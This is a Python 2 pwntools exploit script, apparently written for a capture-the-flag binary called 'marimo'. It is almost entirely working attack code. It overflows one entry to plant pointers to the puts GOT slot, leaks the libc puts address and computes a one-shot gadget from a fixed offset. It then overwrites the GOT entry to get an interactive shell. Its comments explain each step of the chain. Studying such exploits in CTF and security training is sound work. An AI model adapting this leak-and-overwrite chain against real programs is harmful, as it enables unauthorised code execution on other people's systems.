exploit code
from pwn import *
import time
 
def show_me_the_marimo(name, profile):
    """Create one entry via the "show me the marimo" menu command.

    Sends the command, then answers the two ">>" prompts with `name` and
    `profile` in that order, echoing every prompt it consumes. Relies on the
    module-level pwntools connection `r` created in the main block.
    """
    r.sendline("show me the marimo")
    # The binary prompts for the name first, then for the profile.
    for answer in (name, profile):
        print r.recvuntil(">>")
        r.sendline(answer)
    # Drain the prompt that follows the last answer so the caller starts clean.
    print r.recvuntil(">>")
 
def view(select):
    """Enter the "V" (view) menu and choose entry `select`.

    Echoes the prompt consumed between the two sends. The caller reads
    whatever the binary prints for the selected entry afterwards; `r` is the
    module-level connection set up in the main block.
    """
    r.sendline("V")
    prompt = r.recvuntil(">>")
    print prompt
    r.sendline(select)
 
if __name__ == "__main__":
    # Driver for a local ./marimo process. Written for Python 2 / the str-based
    # pwntools API (print statements, str payloads); under Python 3 every
    # sendline/recvuntil argument would have to be bytes.
    binary = "./marimo"
    elf = ELF(binary)
    r = process(binary)

    #strcmp_got = elf.got['strcmp']
    # Address of the puts GOT slot in the target binary; placed twice in the
    # payload below.
    puts_got = elf.got['puts']

    print r.recvuntil(">>")

    # Two entries are created; entry 1 is the one read back later via view("1").
    show_me_the_marimo("A"*4, "B"*4)
    show_me_the_marimo("C"*4, "D"*4)

    # NOTE(review): the 3 s delay is not explained by anything visible here --
    # presumably the binary gates the modify path on elapsed time; confirm
    # against the target before changing it.
    time.sleep(3)
    # Payload: 52 filler bytes, a 4-byte zero, then two 8-byte pointers to the
    # puts GOT slot. The 52/4 split is tied to the target's memory layout and
    # is not derivable from this script -- TODO confirm against the binary.
    payload = "A"*52
    payload += p32(0x0)
    payload += p64(puts_got)
    #payload += p64(strcmp_got)
    payload += p64(puts_got)

    # Select entry 0, modify ("M") it with the payload, then send "B"
    # (presumably "back" to the main menu -- verify).
    view("0")
    print r.recvuntil(">>")
    r.sendline("M")
    print r.recvuntil(">>")
    r.sendline(payload)
    #pause()
    print r.recvuntil(">>")
    r.sendline("B")
    print r.recvuntil(">>")

    # Viewing entry 1 prints its "name : " field; the first 6 bytes are taken
    # as an x86-64 pointer (presumably the runtime address of puts, given the
    # pointer planted above) and zero-padded to 8 bytes for u64.
    view("1")
    print r.recvuntil("name : ")
    libc_puts = u64(r.recv(6).ljust(8, "\x00"))

    print r.recvuntil(">>")
    log.info("libc_puts = {}".format(hex(libc_puts)))
    # Fixed offset from the leaked puts address; it is specific to one libc
    # build, so a different target libc yields a wrong address -- TODO record
    # which libc this offset was computed for.
    libc_oneshot = libc_puts - 0x2a47a
    log.info("oneshot = {}".format(hex(libc_oneshot)))
    # Second modify: write the computed address through the pointer planted by
    # the earlier payload.
    r.sendline("M")
    print r.recvuntil(">>")
    #pause()
    r.sendline(p64(libc_oneshot))
    #pause()

    r.interactive()

